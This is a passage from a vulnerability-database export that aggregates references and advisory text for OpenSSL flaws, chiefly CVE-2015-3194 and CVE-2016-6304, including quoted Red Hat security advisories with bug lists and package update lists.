"https://nvd.nist.gov/vuln/detail/cve-2015-3237" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2015" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0728" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7501" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2017" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7547" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05111017" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4969" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131044" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05130958" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.1, "url": "http://www.hpe.com/info/insightcontrol" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3193" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3195" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3196" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://openssl.org/news/secadv_20151203.txt" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1794" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:26/openssl-10.2.patch.asc" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3194\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:26/openssl-10.1.patch.asc" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv/20151203.txt\u003e" }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:26/openssl-10.1.patch" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3196\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-15:26.openssl.asc\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:26/openssl-9.3.patch" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3195\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:26/openssl-10.2.patch" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:26/openssl-9.3.patch.asc" }, { "trust": 0.1, "url": "https://www.hp.com/go/hpsim" }, { "trust": 0.1, "url": "https://issues.jboss.org/):" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3216" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6808" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1838" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2107" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1839" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4483" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2842" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-8612" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0797" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3185" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1833" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=distributions\u0026version=2.4.23" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1836" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4449" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0286" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5420" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2108" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3627" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2012-1148" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1837" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2109" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1834" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1837" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1839" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5419" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4459" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1833" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1834" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4447" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-7141" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0799" }, { "trust": 0.1, "url": "https://www.openssl.org/about/secpolicy.html" }, { "trust": 0.1, "url": "https://www.openssl.org/about/releasestrat.html)," }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv/20151203.txt" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3194" }, { "db": "BID", "id": "78623" }, { "db": "JVNDB", "id": "JVNDB-2015-006115" }, { "db": "PACKETSTORM", "id": "137294" }, { "db": "PACKETSTORM", "id": "134782" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "134859" }, { "db": "PACKETSTORM", "id": "134650" }, { "db": "PACKETSTORM", "id": "136992" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "169632" }, { "db": "NVD", "id": "CVE-2015-3194" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-3194" }, { "db": "BID", "id": "78623" }, { "db": "JVNDB", "id": "JVNDB-2015-006115" }, { "db": "PACKETSTORM", "id": "137294" }, { "db": "PACKETSTORM", "id": "134782" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "134859" }, { "db": "PACKETSTORM", "id": "134650" }, { "db": "PACKETSTORM", "id": "136992" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "169632" }, { "db": "NVD", "id": "CVE-2015-3194" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-12-06T00:00:00", "db": "VULMON", "id": "CVE-2015-3194" }, { "date": "2015-12-03T00:00:00", "db": "BID", "id": "78623" }, { "date": "2015-12-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006115" }, { "date": "2016-06-02T16:22:00", "db": "PACKETSTORM", "id": "137294" }, { "date": "2015-12-14T16:39:59", "db": "PACKETSTORM", "id": "134782" }, { "date": "2016-06-02T19:12:12", "db": "PACKETSTORM", "id": "137292" }, { "date": "2015-12-16T20:20:47", "db": "PACKETSTORM", "id": "134859" }, { "date": "2015-12-06T13:33:33", "db": "PACKETSTORM", "id": "134650" }, { "date": "2016-05-13T16:14:35", "db": "PACKETSTORM", "id": "136992" }, { "date": "2016-12-16T16:34:49", "db": "PACKETSTORM", "id": "140182" }, { "date": "2015-12-03T12:12:12", "db": "PACKETSTORM", "id": "169632" }, { "date": "2015-12-06T20:59:04.707000", "db": "NVD", "id": "CVE-2015-3194" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2015-3194" }, { "date": "2017-12-19T22:37:00", "db": "BID", "id": "78623" }, { "date": "2016-09-30T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006115" }, { "date": "2023-11-07T02:25:31.567000", "db": "NVD", "id": "CVE-2015-3194" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "78623" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of crypto/rsa/rsa_ameth.c Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006115" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Failure to Handle Exceptional Conditions", "sources": [ { "db": "BID", "id": "78623" } ], "trust": 0.3 } }
var-201609-0593
Vulnerability from variot
Multiple memory leaks in t1_lib.c in OpenSSL before 1.0.1u, 1.0.2 before 1.0.2i, and 1.1.0 before 1.1.0a allow remote attackers to cause a denial of service (memory consumption) via large OCSP Status Request extensions. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to cause a denial-of-service condition. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.
This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes, which are documented in the Release Notes document linked to in the References. (CVE-2016-6304)
-
It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. (CVE-2016-0736)
-
It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. (CVE-2016-8610)
-
It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)
-
A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. After installing the updated packages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):
1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth 1384743 - CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS 1401528 - CVE-2016-8740 httpd: Incomplete handling of LimitRequestFields directive in mod_http2 1406744 - CVE-2016-0736 httpd: Padding Oracle in Apache mod_session_crypto 1406753 - CVE-2016-2161 httpd: DoS vulnerability in mod_auth_digest 1406822 - CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects 1412120 - CVE-2016-7056 openssl: ECDSA P-256 timing attack key recovery
- JIRA issues fixed (https://issues.jboss.org/):
JBCS-319 - Errata for httpd 2.4.23 SP1 RHEL 7
Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies. The updates are documented in the Release Notes document linked to in the References. If sendfile processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could lead to invalid responses or information disclosure. (CVE-2017-5647)
- A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. Solution:
Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:1940-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html Issue date: 2016-09-27 CVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. (CVE-2016-2178)
-
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL to reject further packets sent from a DTLS client over an established DTLS connection. (CVE-2016-2181)
-
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. (CVE-2016-2182)
-
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)
This update mitigates the CVE-2016-2183 issue by lowering priority of DES cipher suites so they are not preferred over cipher suites using AES. For compatibility reasons, DES cipher suites remain enabled by default and included in the set of cipher suites identified by the HIGH cipher string. Future updates may move them to MEDIUM or not enable them by default.
-
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. (CVE-2016-6302)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
-
An out of bounds read flaw was found in the way OpenSSL formatted Public Key Infrastructure Time-Stamp Protocol data for printing. An attacker could possibly cause an application using OpenSSL to crash if it printed time stamp data from the attacker. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL. (CVE-2016-6306)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio() 1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() 1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer 1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks 1377594 - CVE-2016-6306 openssl: certificate message OOB reads 1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.3.ppc.rpm openssl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.3.s390.rpm openssl-1.0.1e-48.el6_8.3.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-devel-1.0.1e-48.el6_8.3.s390.rpm openssl-devel-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-static-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-perl-1.0.1e-48.el6_8.3.s390x.rpm openssl-static-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.7.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-devel-1.0.1e-51.el7_2.7.s390.rpm openssl-devel-1.0.1e-51.el7_2.7.s390x.rpm openssl-libs-1.0.1e-51.el7_2.7.s390.rpm openssl-libs-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
